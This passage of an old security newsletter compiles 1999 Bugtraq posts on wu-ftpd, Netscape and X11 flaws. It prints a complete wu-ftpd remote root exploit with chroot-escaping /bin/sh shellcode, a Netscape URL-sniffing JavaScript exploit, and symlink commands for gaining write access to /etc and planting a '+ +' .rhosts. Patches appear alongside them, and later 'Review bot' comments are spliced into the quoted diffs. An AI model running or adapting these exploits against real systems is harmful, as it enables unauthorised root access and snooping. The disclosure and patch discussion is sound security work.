AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Mar 21 17:21:47 gear
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Mar 21 12:21:47 gear ftpd[21737]: exiting on signal 11

oops..... now it attempted to execute piece at 0x41414141 addy..


Some previous beta releases of wu-ftpd are NOT vulnerable
to this thing because they just don't call realpath function (which does
overflow) from makedir() function. Here's quick patch I've done to this
piece (cc'ed to bugtraq since I haven't seen yet any patches fixing this
problem were posted there):

--/cut here/--

--- ftpd.c.orig Mon Jul 6 15:14:25 1998
+++ ftpd.c Sun Mar 21 18:17:52 1999
@@ -3146,19 +3146,24 @@

if (mkdir(name, 0777) < 0) {
if (errno == EEXIST){
- realpath(name, path);
- reply(521, "\"%s\" directory exists", path);
+ if(realpath(name, path))
+ reply(521, "\"%s\" directory exists.", path);
+ else reply(521,"path too long.");
}else
perror_reply(550, name);
return;
}
- realpath(name, path);
/* According to RFC 959:
* The 257 reply to the MKD command must always contain the
* absolute pathname of the created directory.
* This is implemented here using similar code to the PWD command.
* XXX - still need to do `quote-doubling'.
*/

+ if(!realpath(name, path))
+ if (strlen(path)!=0)
+ reply(257,"\"%s\" directory created name truncated.",path);
+ else reply(500,"no directory created. Path too long.");
+ else
reply(257, "\"%s\" new directory created.", path);
}
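Review bot: the final else branch in this hunk replies 500 "no directory created. Path too long." although the mkdir(name, 0777) at the top of the hunk has already succeeded, so the directory exists while the client is told it does not; and the strlen(path) != 0 test assumes realpath() wrote something into path before returning NULL, which the realpath.c hunks below do not guarantee (their new return(NULL) paths exit before the strcpy into result), so the 257 "name truncated" reply can echo whatever path held from an earlier command. Suggest clearing path before the realpath() call and, on a NULL return, sending a reply that states what actually happened (the directory was created but its name could not be canonicalised) rather than a 500.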

--- realpath.c.orig Sun Mar 21 17:29:42 1999
+++ realpath.c Sun Mar 21 18:08:28 1999
@@ -40,6 +40,7 @@
#include <sys/stat.h>
#include <sys/param.h>
#include <string.h>
+#include <syslog.h>

#ifndef HAVE_SYMLINK
#define lstat stat
@@ -55,10 +56,10 @@
#endif
{
struct stat sbuf;
- char curpath[MAXPATHLEN],
- workpath[MAXPATHLEN],
- linkpath[MAXPATHLEN],
- namebuf[MAXPATHLEN],
+ char curpath[MAXPATHLEN+1],
+ workpath[MAXPATHLEN+1],
+ linkpath[MAXPATHLEN+1],
+ namebuf[MAXPATHLEN+1],
*where,
*ptr,
*last;
@@ -75,7 +76,7 @@
return(NULL);
}

- strcpy(curpath, pathname);
+ strncpy(curpath, pathname,MAXPATHLEN);

if (*pathname != '/') {
uid_t userid;
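Review bot: strncpy(curpath, pathname, MAXPATHLEN) does not write a terminator when pathname is MAXPATHLEN bytes or longer, and nothing in the patch sets curpath[MAXPATHLEN] = '\0' afterwards, so the later walk over curpath can run off the end of the buffer; either terminate explicitly after the copy (`curpath[MAXPATHLEN] = '\0';`) or, preferably, reject over-long input before copying (`if (strlen(pathname) >= MAXPATHLEN) return(NULL);`), since silently truncating a pathname changes which file it names.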
@@ -93,7 +94,7 @@
#else
if (!getwd(workpath)) {
#endif
- strcpy(result, ".");
+ strncpy(result, ".",MAXPATHLEN);
seteuid(userid);
enable_signaling(); /* we can allow signals once again: kinch */
return (NULL);
@@ -142,9 +143,13 @@
for (last = namebuf; *last; last++)
continue;
if ((last == namebuf) || (*--last != '/'))
- strcat(namebuf, "/");
- strcat(namebuf, where);
-
+ strncat(namebuf, "/",MAXPATHLEN-strlen(namebuf));
+ strncat(namebuf, where,MAXPATHLEN-strlen(namebuf));
+ if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) {
+ syslog(LOG_DAEMON|LOG_NOTICE,"possible buffer overflow attempt");
+ return(NULL);
+ }
+
where = ++ptr;
if (lstat(namebuf, &sbuf) == -1) {
strcpy(result, namebuf);
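Review bot: the length check at the end of this hunk runs after the two strncat() calls have already appended `where`, so strlen(namebuf)+strlen(where) counts the component twice; truncation is still caught, but legitimate paths whose real length is well under MAXPATHLEN are refused and logged as "possible buffer overflow attempt". Test `strlen(namebuf) + 1 + strlen(where) >= MAXPATHLEN` before appending instead. The unchanged strcpy(result, namebuf) in the trailing context can also now copy MAXPATHLEN characters plus the terminator, because the -55 hunk grew namebuf by one byte while result was not enlarged.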
@@ -163,8 +168,13 @@
if (*linkpath == '/')
*workpath = '\0';
if (*where) {
- strcat(linkpath, "/");
- strcat(linkpath, where);
+ strncat(linkpath, "/",MAXPATHLEN-strlen(linkpath));
+ strncat(linkpath, where,MAXPATHLEN-strlen(linkpath));
+ if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) {
+ syslog(LOG_DAEMON|LOG_NOTICE,
+ "possible buffer overflow attempt");
+ return(NULL);
+ }
}
strcpy(curpath, linkpath);
goto loop;
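Review bot: the new check in this hunk tests namebuf and where, but the buffer that was just appended to is linkpath, so an over-long symlink expansion is never detected here and the function continues with a truncated linkpath (it is only rejected, if at all, by the namebuf check on the next pass through the loop); the test should be `strlen(linkpath) + 1 + strlen(where) >= MAXPATHLEN`, placed before the strncat() calls.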

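The whole thread turns on one pattern: realpath() building the canonical path by strcat()ing a client-supplied component onto a MAXPATHLEN buffer with no length check, then strcpy()ing the result into the caller's MAXPATHLEN buffer. As an added example that is not part of wu-ftpd or of either patch above, the C below shows that pattern beside a bounded replacement that computes the final length before writing, refuses instead of truncating, and empties the buffer on refusal so a caller that inspects it afterwards (as the ftpd.c patch does with strlen(path)) cannot pick up stale contents. MAXPATHLEN is stood in for by a 32-byte DEMO_PATHLEN so the overflow case stays short, and all function names are mine.

```c
#include <stdio.h>
#include <string.h>

#define DEMO_PATHLEN 32   /* stands in for MAXPATHLEN; small so the refused case is short */

/* The pattern the thread is about: the caller-controlled component is
 * strcat()ed onto a fixed buffer with no length check, so anything longer
 * than the space left in buf runs past its end. Shown for contrast only;
 * never call it with input you do not control. */
void unsafe_append(char *buf, const char *component)
{
    size_t blen = strlen(buf);
    if (blen == 0 || buf[blen - 1] != '/')
        strcat(buf, "/");
    strcat(buf, component);
}

/* Bounded replacement. Works out the final length first and refuses
 * (rather than truncates) when buf + "/" + component + NUL would exceed
 * bufsz bytes. On refusal buf is emptied so stale data cannot be read. */
int safe_append(char *buf, size_t bufsz, const char *component)
{
    size_t blen = strlen(buf);
    size_t clen = strlen(component);
    int need_slash = (blen == 0 || buf[blen - 1] != '/');
    size_t need = blen + (need_slash ? 1 : 0) + clen + 1;

    if (need > bufsz) {
        buf[0] = '\0';
        return -1;
    }
    if (need_slash)
        buf[blen++] = '/';
    memcpy(buf + blen, component, clen + 1);   /* clen + 1 copies the NUL */
    return 0;
}

/* Walks relpath one component at a time, the way realpath()'s loop does,
 * appending each with the bounded helper. Returns 0 on success or -1 as
 * soon as a component would overflow, leaving out empty. */
int build_path(char *out, size_t outsz, const char *base, const char *relpath)
{
    char comp[DEMO_PATHLEN];
    const char *p = relpath;
    size_t n;

    if (outsz == 0)
        return -1;
    if (strlen(base) >= outsz) {
        out[0] = '\0';
        return -1;
    }
    strcpy(out, base);                       /* bounded by the check above */
    while (*p != '\0') {
        n = strcspn(p, "/");
        if (n >= sizeof comp) {
            out[0] = '\0';
            return -1;
        }
        memcpy(comp, p, n);
        comp[n] = '\0';
        if (n > 0 && safe_append(out, outsz, comp) != 0)
            return -1;                       /* out already emptied */
        p += n;
        if (*p == '/')
            p++;                             /* skip separator; "//" collapses */
    }
    return 0;
}

/* Convenience wrapper over a static DEMO_PATHLEN buffer: returns the built
 * path, or NULL when it was refused (demo_buf is then empty). */
static char demo_buf[DEMO_PATHLEN];
const char *demo_build(const char *base, const char *relpath)
{
    return build_path(demo_buf, sizeof demo_buf, base, relpath) == 0 ? demo_buf : NULL;
}

int main(void)
{
    /* constructed inputs, modelled on the MKD argument in the thread */
    const char *ok = demo_build("/home/ftp", "pub/incoming");
    printf("fits:     %s\n", ok ? ok : "(refused)");
    const char *bad = demo_build("/home/ftp", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    printf("too long: %s (buffer now \"%s\")\n", bad ? bad : "(refused)", demo_buf);
    return 0;
}
```

The design choice worth noting against the patches above is that the length test happens before any byte is written and counts the separator exactly once, so there is neither a truncated intermediate result to worry about nor a spurious "overflow attempt" for paths that actually fit.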
@HWA

28.0 wh0a.c wu-FTPd beta exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 25 Mar 1999 15:42:47 +0100
From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
To: BUGTRAQ@netspace.org
Subject: another ftp exploit

/*

wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 )
by joey__ <youcan_reachme@hotmail.com> of rhino9 <http://www.rhino9.com> - 2/20/99

big thx horizon, duke, nimrood and icee
sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha

USAGE:

( ./wh0a [ initialdir ] [ <username> <password> ] [ <offset> <code address> ] ; cat ) | nc <victimname> <victimport>

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char x86_shellcode0[156] =

"\x83\xec\x04" /* sub esp,4 */
/* esi -> local variables and data */
"\x5e" /* pop esi */
"\x83\xc6\x70" /* add esi,0x70 */
"\x83\xc6\x20" /* add esi,0x20 */


"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
/* decode the strings */
"\x31\xc9" /* xor ecx, ecx */
"\xb1\x30" /* mov cl,0x30 */
"\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */
"\x43" /* inc ebx */
"\x49" /* dec ecx */
"\x75\xf9" /* jnz short decode_next_byte */

"\x31\xc0" /* xor eax,eax */
/* setuid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x17" /* mov al,0x17 */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* setgid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x2e" /* mov al,0x2e */
"\xcd\x80" /* int 0x80 */

/* To break chroot we have to...

fd = open ( ".", O_RDONLY );
mkdir ( "hax0r", 0666 );
chroot ( "hax0r" );
fchdir ( fd );
for ( i = 0; i < 254; i++ )
chdir ( ".." );
chroot ( "." );

*/


"\x31\xc0" /* xor eax,eax */
/* var0 = open ( ".", O_RDONLY ) */
"\x31\xc9" /* xor ecx,ecx */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x05" /* mov al,0x05 */
"\xcd\x80" /* int 0x80 */
"\x89\x06" /* mov [esi],eax */

"\x31\xc0" /* xor eax,eax */
/* mkdir ( "hax0r", 0666 ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */
"\xb0\x27" /* mov al,0x27 */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* chroot ( "hax0r" ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* fchdir ( fd ) */
"\x8b\x1e" /* mov ebx,[esi] */
"\xb0\x85" /* mov al,0x85 */
"\xcd\x80" /* int 0x80 */

"\x31\xc9" /* xor ecx, ecx */
/* for ( i = 0; i < 254; i++ ) { */
"\xb1\xfe" /* mov cl,0xfe */

"\x31\xc0" /* xor eax,eax */
/* chdir ( ".." ) */
"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
"\xb0\x0c" /* mov al,0x0c */
"\xcd\x80" /* int 0x80 */

"\x49" /* dec ecx */
/* } */
"\x75\xf4" /* jnz short goto_parent_dir */

"\x31\xc0" /* xor eax,eax */
/* chroot ( "." ) */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* execve ( "/bin/sh", "xxxxx", NULL ) */
"\x8d\x5e\x17" /* lea ebx,[esi+0x17] */
"\x8d\x4e\x04" /* lea ecx,[esi+0x04] */
"\x8d\x56\x08" /* lea edx,[esi+0x08] */
"\x89\x19" /* mov [ecx],ebx */
"\x89\x02" /* mov [edx],eax */
"\xb0\x0b" /* mov al, 0x0b */
"\xcd\x80" /* int 0x80 */

"\x31\xdb" /* xor ebx,ebx */
/* exit ( 0 ) */
"\x89\xd8" /* mov eax,ebx */
"\x40" /* inc eax */
"\xcd\x80" /* int 0x80 */

"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"

"var0"
/* local variable integer */
"cmd0"
/* char *cmd[2] */
"cmd1";


char x86_shellcode1[1024] =
".."
"\x00"
"."
"\x00"
"hax0r"
"\x00"
"/bin/sh"
"\x00"
"\xb6\x01\x00\x00";


char vardir[300];
int varlen;


int main ( int argc, char **argv )
{

char *username, *password, *initialdir;
int bufoffset, codeaddr, i, j, *pcodeaddr;

if ( argc > 1 )
initialdir = argv[1];
else initialdir = "/incoming";

if ( argc > 3 )
{
username = argv[2];
password = argv[3];
}
else
{
username = "anonymous";
password = "poon@ni.com";
}

if ( argc > 5 )
{
bufoffset = atoi ( argv[4] );
codeaddr = atoi ( argv[5] );
}
else
{
bufoffset = 195;
codeaddr = 0x0805ac81;
}

printf ( "user %s\n", username );

printf ( "pass %s\n", password );

printf ( "cwd %s\n", initialdir );

varlen = bufoffset - strlen ( initialdir );
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 170;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 250;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';

for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ )
vardir[i] = x86_shellcode0[i];
j = 0;
for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ )
{
vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 );
}

pcodeaddr = ( int * ) &( vardir[varlen] );
*pcodeaddr = codeaddr;
vardir[varlen+4] = 0;

printf ( "mkd %s\n", vardir );

}

----------------------------------------------------------------------

Date: Fri, 26 Mar 1999 14:08:25 +0200
From: Artem Malyshev <artem@AM.ALEXRADIO.COM>
To: BUGTRAQ@netspace.org
Subject: Re: another ftp exploit (fwd)

> /* To break chroot we have to...
>
> fd = open ( ".", O_RDONLY );
> mkdir ( "hax0r", 0666 );
> chroot ( "hax0r" );
> fchdir ( fd );
> for ( i = 0; i < 254; i++ )
> chdir ( ".." );
> chroot ( "." );
>
> */


Too complex for standard linux
All we have to do to break chroot is:

mkdir("/sh"); // we already have string "/sh" in memory as a part of
// "/bin/sh"
chroot("/sh");
chroot("../../../../../../../../../"); // a number of "../" here,
// I used 0x10

Last string can be built in stack with a simple loop
Tested on linux 2.2.1

-am


@HWA


29.0 Netscape 4.51 allows url sniffing from another window , exploit and patch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 25 Mar 1999 20:07:52 +0200
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator 4.51 allows sniffing of URLs from another window

There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT
(probably others?), which allows sniffing URLs from another window.
The exploit uses the ability to execute JavaScript code from specially
designed URLs in the javascript console window, when an error is deliberately
invoked.

Demonstration and source is available at:
http://www.nat.bg/~joro/b11.html

(The exploit does not work if you are behind some versions of a squid proxy.
If you do not see your URL in a message box, try reloading the main page).

Workaround: Disable JavaScript.

Regards,
Georgi Guninski

----------Demonstration and source----------
http://www.nat.bg/~joro/b11.html
--------------------------------------------
<html>
<head>
<title>Control window</title>
</head>
<frameset cols="0,*">
<frame src="wysiwyg://1/file:///?<SCRIPT>s='Your URL is: '+document.links[document.links.length-2];alert(s);top.MochaOutput.location = 'javascript:@clear';top.close();</SCRIPT>" name="err">
<frame src="b11main.html">
</frameset>
</html>

--------------------------------------------
http://www.nat.bg/~joro/b11main.html
--------------------------------------------
<HTML>
<HEAD><TITLE>
Control Window
</TITLE></HEAD>

<SCRIPT>

tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();

function show()
{
tracked.location="javascript:error";
top.err.location="javascript:error";
top.err.location="javascript:";
}
</SCRIPT>

There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>
This page tracks the URLs the user visits in another window.<BR>
Enter your URL in the 'Tracked window'. Wait until the document is loaded, then click 'Show URL'.<BR>
This exploit needs Javascript enabled.<BR>
Workaround: Disable Javascript.

<FORM>
<INPUT TYPE=BUTTON VALUE="Show URL" onclick="setTimeout('show()',1000)">
</FORM>
<HR>
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>


@HWA

30.0 X11R6 rewt compromise exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sun, 21 Mar 1999 21:34:48 -0800
From: in.telnetd <telnetd@DOEMILL.SHOCKING.COM>
To: BUGTRAQ@netspace.org
Subject: X11R6 NetBSD Security Problem

Hey
If this has already been brought up, you have the right to stone me to
death, but I haven't seen it and I've searched, so here it is:

I was fooling around today, and decided to rm /tmp/.X11-unix and then make
a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed
up /etc/passwd and
ln -s /etc/passwd /tmp/.X11-unix
and then startx'd as a normal user account, but X wouldn't start; it
complained and said "is not a directory". So, I made a symbolic link from
/root to /tmp/.X11-unix, and startx'd as a normal user, and was surprised
to have write access to /root.
I was able to write new files to /root but was not able to overwrite or
change files; I was able to make a "+ +" .rhosts though.
I did this to /etc also, changed it from:

drwxr-xr-x

To:

drwxrwxrwt

with:

telnetd ~$ ln -s /etc /tmp/.X11-unix
telnetd ~$ startx

I have tested this via a remote telnet session also. It works if you are
able to startx and X isn't already running.
I swung my chair around and got on my gateway, telnetted to stinky, logged
in as a normal user, ln -s /etc /tmp/.X11-unix, startx'd remotely, saw
the X startup crap, looked behind me and saw X starting on stinky, I
turned to my gateway and stopped X, and had write access to /etc.

wh00t@$#!$

The only real thing I can think of for this to be useful is .rhosts in
/root...
later
telnetd@doemill.shocking.com

-----------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 21:41:40 -0800
From: in.telnetd <telnetd@DOEMILL.SHOCKING.COM>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

oops, I forgot to say, this was on NetBSD 1.3.3, fresh install.
If you could append this to my last message, it would be appreciated, aleph1.

-----------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 17:20:26 -0800
From: /usr/libexec/telnetd <telnetd@DOEMILL.SHOCKING.COM>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

Well, when there's a reboot, /tmp/ is cleared. And if you haven't started X
yet, it could be a problem. This isn't an ultra spiffy important problem,
just thought I would bring it up.


> drwxrwxrwt 2 root root 1024 Mar 25 10:52 .X11-unix/
>
> I'd like to see a non-root user delete that from /tmp. Many systems have this
> in place like this, since root is the first to log into X. Systems that do not
> have this directory owned by root should chown it.
>
> Taral
>

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 23:41:02 +0200
From: Petras Sinkevicius <petras@BEBRAS.DAMMIT.LT>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

On Sun, 21 Mar 1999, in.telnetd wrote:

> oops, I forgot to say, this was on NetBSD 1.3.3, fresh install.
> If you could append this to my last message, it would be appreciated, aleph1.
>

This also works under Linux, X11 v3.3.3, links to directories and files

----
bebras@petras:/tmp> ln -s /etc/group /tmp/.X11-unix
bebras@petras:/tmp> ls -l /etc/group
-rw-r--r-- 1 root root 336 Mar 6 13:56 /etc/group
bebras@petras:/tmp> startx
_X11TransSocketUNIXConnect: Can't connect: errno = 111
giving up.
xinit: Connection refused (errno 111): unable to connect to X server
xinit: No such process (errno 3): Server error.
bebras@petras:/tmp> ls -l /etc/group
-rwxrwxrwt 1 root root 336 Mar 6 13:56 /etc/group*
----

--
Drakosha
Petras Sinkevicius
petras@bebras.dammit.lt

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 21:21:20 +0100
From: Matthieu Herrb <matthieu@laas.fr>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

in.telnetd wrote (in a message from Sunday 21)
>
> telnetd ~$ ln -s /etc /tmp/.X11-unix
> telnetd ~$ startx

The following patch should fix this:

Index: xc/lib/xtrans/Xtransint.h
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtransint.h,v
retrieving revision 1.1.1.2
diff -u -r1.1.1.2 Xtransint.h
--- xc/lib/xtrans/Xtransint.h 1998/11/28 08:26:08 1.1.1.2
+++ xc/lib/xtrans/Xtransint.h 1999/03/26 08:20:27
@@ -455,6 +455,12 @@
#endif
);

+static int trans_mkdir (
+#if NeedFunctionPrototypes
+ char *, /* path */
+ int /* mode */
+#endif
+);

/*
* Some XTRANSDEBUG stuff
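Review bot: the prototype at `+static int trans_mkdir (` is declared static in Xtransint.h while the definition added at the end of Xtransutil.c is also static, so a source file that calls trans_mkdir() only links if it is compiled into the same translation unit as Xtransutil.c; any unit that picks up the header and a call without the definition fails with an undefined static function. Either state that single-translation-unit assumption in a comment next to the prototype, or drop the static and give the function an internal xtrans name so the four callers in Xtranslcl.c and Xtranssock.c link regardless of how the library is built.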
Index: xc/lib/xtrans/Xtranslcl.c
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtranslcl.c,v
retrieving revision 1.1.1.4
diff -u -r1.1.1.4 Xtranslcl.c
--- xc/lib/xtrans/Xtranslcl.c 1999/01/08 17:31:44 1.1.1.4
+++ xc/lib/xtrans/Xtranslcl.c 1999/03/26 08:20:32
@@ -444,9 +444,11 @@
#else
mode = 0777;
#endif
-
- mkdir(X_STREAMS_DIR, mode);
- chmod(X_STREAMS_DIR, mode);
+ if (trans_mkdir(X_STREAMS_DIR, mode) == -1) {
+ PRMSG (1, "PTSOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_STREAMS_DIR, errno, 0);
+ return(-1);
+ }

if( (fd=open(server_path, O_RDWR)) >= 0 ) {
#if 0
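Review bot: the `errno = %d` in the new PRMSG will print EEXIST whenever trans_mkdir() rejected an existing object, which is exactly the symlink case this patch is for, because the rejection branches in trans_mkdir() return -1 without touching errno after the failed mkdir(). An admin reading the log then sees a benign-looking "already exists" failure. Have trans_mkdir() set errno to ENOTDIR or EACCES on the "exists but unacceptable" branches, or log a distinct message for that case so the planted link is visible in the server output.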
@@ -724,9 +726,11 @@
#else
mode = 0777;
#endif
-
- mkdir(X_STREAMS_DIR, mode);
- chmod(X_STREAMS_DIR, mode);
+ if (trans_mkdir(X_STREAMS_DIR, mode) == -1) {
+ PRMSG (1, "NAMEDOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_STREAMS_DIR, errno, 0);
+ return(-1);
+ }

if(stat(server_path, &sbuf) != 0) {
if (errno == ENOENT) {
@@ -1044,10 +1048,18 @@
mode = 0777;
#endif

- mkdir(X_STREAMS_DIR, mode); /* "/dev/X" */

- chmod(X_STREAMS_DIR, mode);
- mkdir(X_ISC_DIR, mode); /* "/dev/X/ISCCONN" */
- chmod(X_ISC_DIR, mode);
+ /* "/dev/X" */
+ if (trans_mkdir(X_STREAMS_DIR, mode) == -1) {
+ PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_STREAMS_DIR, errno, 0);
+ return(-1);
+ }
+ /* "/dev/X/ISCCONN" */
+ if (trans_mkdir(X_ISC_DIR, mode) == -1) {
+ PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_ISC_DIR, errno, 0);
+ return(-1);
+ }

unlink(server_path);

@@ -1072,8 +1084,11 @@
*/
#define X_UNIX_DIR "/tmp/.X11-unix"

- mkdir(X_UNIX_DIR, mode);
- chmod(X_UNIX_DIR, mode);
+ if (trans_mkdir(X_UNIX_DIR, mode) == -1) {
+ PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_UNIX_DIR, errno, 0);
+ return(-1);
+ }

unlink(server_unix_path);
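Review bot: X_UNIX_DIR is defined locally as "/tmp/.X11-unix" just above this hunk, while Xtranssock.c creates the same directory under the name UNIX_DIR; two definitions of one security-sensitive path, each paired with its own mode selection, will drift the next time either is touched. Move the define (and the mode choice) into Xtransint.h and use it from both files.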

Index: xc/lib/xtrans/Xtranssock.c
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtranssock.c,v
retrieving revision 1.1.1.4
diff -u -r1.1.1.4 Xtranssock.c
--- xc/lib/xtrans/Xtranssock.c 1999/01/08 17:31:46 1.1.1.4
+++ xc/lib/xtrans/Xtranssock.c 1999/03/26 08:20:38
@@ -946,8 +946,11 @@
#else
mode = 0777;
#endif
- mkdir (UNIX_DIR, mode);
- chmod (UNIX_DIR, mode);
+ if (trans_mkdir(UNIX_DIR, mode) == -1) {
+ PRMSG (1, "SocketUNIXCreateListener: mkdir(%s) failed, errno = %d\n",
+ UNIX_DIR, errno, 0);
+ return TRANS_CREATE_LISTENER_FAILED;
+ }
#endif

sockname.sun_family = AF_UNIX;
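Review bot: the `#else` branch immediately above the hunk still sets `mode = 0777`, so on a build without the sticky-bit define the socket directory stays world-writable without +t and any local user can unlink or replace another user's X0 socket after this fix, and the new trans_mkdir() mode test will also accept a pre-existing 0777 directory there. Prefer 01777 wherever the platform supports it, and treat a platform that cannot set the sticky bit as a failure to report rather than a silent fallback to 0777.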
@@ -1041,8 +1044,11 @@
#else
mode = 0777;
#endif
- mkdir (UNIX_DIR, mode);
- chmod (UNIX_DIR, mode);
+ if (trans_mkdir(UNIX_DIR, mode) == -1) {
+ PRMSG (1, "SocketUNIXResetListener: mkdir(%s) failed, errno = %d\n",
+ UNIX_DIR, errno, 0);
+ return TRANS_RESET_FAILURE;
+ }
#endif

close (ciptr->fd);
Index: xc/lib/xtrans/Xtransutil.c
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtransutil.c,v
retrieving revision 1.1.1.1
diff -u -r1.1.1.1 Xtransutil.c
--- xc/lib/xtrans/Xtransutil.c 1997/09/05 09:02:43 1.1.1.1
+++ xc/lib/xtrans/Xtransutil.c 1999/03/26 08:20:40
@@ -465,3 +465,32 @@

return (1);
}
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <errno.h>
+
+static int
+trans_mkdir(char *path, int mode)
+{
+ struct stat buf;
+
+ if (mkdir(path, mode) == 0) {
+ /* I don't know why this is done, but it was in the original
+ xtrans code */

+ chmod(path, mode);
+ return 0;
+ }
+ /* If mkdir failed with EEXIST, test if it is a directory with
+ the right modes, else fail */

+ if (errno == EEXIST) {
+ if (stat(path, &buf) != 0) {
+ return -1;
+ }
+ if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) {
+ return 0;
+ }
+ }
+ /* In all other cases, fail */
+ return -1;
+}
